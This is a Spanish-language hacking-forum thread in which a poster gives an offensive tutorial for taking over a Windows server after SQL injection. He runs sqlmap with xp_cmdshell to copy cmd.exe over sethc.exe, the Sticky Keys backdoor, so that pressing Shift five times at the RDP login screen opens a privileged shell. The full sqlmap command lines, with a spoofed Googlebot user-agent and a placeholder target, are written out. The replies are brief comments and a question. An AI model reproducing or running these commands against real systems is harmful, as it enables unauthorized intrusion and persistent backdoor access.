Este sitio utiliza cookies propias y de terceros. Si continúa navegando consideramos que acepta el uso de cookies. OK Más Información.

Escalando privilegios en un servidor Windows desde una SQLi.

  • 3 Respuestas
  • 4689 Vistas

0 Usuarios y 1 Visitante están viendo este tema.

Desconectado m0rf30

  • *
  • Underc0der
  • Mensajes: 3
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
« en: Julio 17, 2016, 12:16:45 am »
En la parte anterior vimos lo siguiente:

     Exploit para MySQL vulnerable.
     Como saber los usuarios que hay en la base de datos en la que estamos trabajando con Sqlmap.
     Saber los privilegios de esos usuarios.
     Conocer que usuario somos en la base de datos.
     Averiguar si somos Administradores de la base de datos.

Continuemos.
Sabemos que somos un usuario con privilegios y que somos dba (data base admin).



 y que podemos ejecutar comandos con xp_cmdshell



omo podemos ver tiene abierto el puerto 3389 osea el puerto de administracion remota de windows

Ya sabemos que no podemos:

     Subir una webshell.
     Penetrar mediante Metasploit.



Entonces usemos nuestra imaginación de Hacker’s, pensemos que podemos hacer para poder explotar ese puerto y obtener acceso al servidor, tiene que ser algo que no implique exploits que inyecten código ya que no funciona (En este caso).



No se les ocurre nada??

Pues les mostrare una manera fácil y sencilla dado nuestro caso.

Aprovecharemos Sqlmap para entrar…, ¿¿sqlmap?? ¿¿Pero ya hicimos eso no??.

Pues si y no.
Realizamos el SQLi, pero ahora lo que haremos sera utilizar xp_cmdshell. Vamos.

Primero les enseñare algo que ocurre en el servidor.

En el sistema Windows cuando pulsas repetidas veces la tecla Shift o Mayus aparece un mensaje.

http://2.bp.blogspot.com/-QdL0Cpvym6s/Vp1Ye_3ZsfI/AAAAAAAAG6M/LtfwVPPl6YI/s640/Selecci%25C3%25B3n_064.png

Presione Shift 5 veces seguidas



Ese es el archivo ejecutable que abre ese dialogo, entonces aprovecharemos eso para entrar al sevidor.

Vamos a la consola y con el comando

rdesktop IPdelServidor

Nos conectaremos a el mediante el puerto 3389.



y 5 Shift’s o Mayus despues…



Muy bien funciona como debería. Ahora a explotarlo >:}

Volvemos a Sqlmap y ejecutemos lo siguiente con xp_cmdshell:

Código: Text
  1. sqlmap -u http://www.sitiovulnerable.mx/login.asp –forms –dbms=MSSQL –user-agent=”Mozilla 5 (compatible , Googlebot/2.1, http://www.google.com/bot.html)”  –level=5 –risk=3 –os-cmd=’Copy “c:\windows\system32\sethc.exe” “c:\windows\system32\sethc.zzz”‘

Copiara el archivo sethc.exe que esta en “C:/windows/system32/” a esa misma carpeta pero a un archivo llamado sethc.zzz veamos.



Muy bien ahora otro comando.

Código: Text
  1. sqlmap -u http://www.sitiovulnerable.mx/login.asp –forms –dbms=MSSQL –user-agent=”Mozilla 5 (compatible , Googlebot/2.1, http://www.google.com/bot.html)”  –level=5 –risk=3 –os-cmd=’Copy “c:\windows\system32\cmd.exe” “c:\windows\system32\sethc.exe”‘
  2.  

 De nuevo expliquemos.

Código: Text
  1. –os-cmd=’Copy “c:\windows\system32\cmd.exe” “c:\windows\system32\sethc.exe”‘

Copiara de la carpeta “C://windows/system32/” el archivo cmd.exe a esa misma carpeta pero con el nombre sethc.exe ya entendieron
« Última modificación: Julio 18, 2016, 11:06:23 am por EPSILON »

Desconectado EPSILON

« Respuesta #1 en: Julio 18, 2016, 10:56:13 am »
@m0rf30 edite el titulo de tus posts, porque no guardan una relacion directa como si fuesen un manual en pasos o paper.

Saludos!, EPSILON

Desconectado Script_23

  • *
  • Underc0der
  • Mensajes: 3
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
« Respuesta #2 en: Septiembre 17, 2017, 01:47:29 am »
Y si resulta que no eres usuario dba solo un usuario "normal", como seria para poder escalar a un usuario con priv  y poder acceder a las dbs restringidas??

Desconectado zoro248

  • *
  • Underc0der
  • Mensajes: 242
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
    • Email
« Respuesta #3 en: Septiembre 26, 2017, 03:27:48 pm »
Muy buen tuto, aunque lo apropiado es que no se llamara "Escalacion de Privilegios", ya que el usuario en un principio es DBA y por ende ya tienes bastante ventaja


Saludos!

 

¿Te gustó el post? COMPARTILO!



WhoUr herramienta para recopilar informacion de una web y buscar webs a vul sqli

Iniciado por jopcode

Respuestas: 0
Vistas: 2926
Último mensaje Noviembre 30, 2017, 10:57:00 pm
por jopcode
Configura un servidor SSH en Ubuntu para acceder a tu equipo de forma remota

Iniciado por 54NDR4

Respuestas: 2
Vistas: 3816
Último mensaje Abril 10, 2013, 04:11:48 pm
por Adastra
¿Como debo empezar para auditar un servidor web? - Nivel Intermedio

Iniciado por BrowserNet

Respuestas: 12
Vistas: 11249
Último mensaje Octubre 09, 2016, 02:24:36 am
por ceroMee
[Video- español] Curso de SQL INJECTION (SQLI) - Básico a Avanzado

Iniciado por Franciscodc

Respuestas: 1
Vistas: 6823
Último mensaje Agosto 29, 2018, 02:50:31 am
por Lmntr1x
Instalar servidor proxy caché Squid en Ubuntu server

Iniciado por CodePunisher

Respuestas: 0
Vistas: 4179
Último mensaje Julio 25, 2013, 05:30:02 pm
por CodePunisher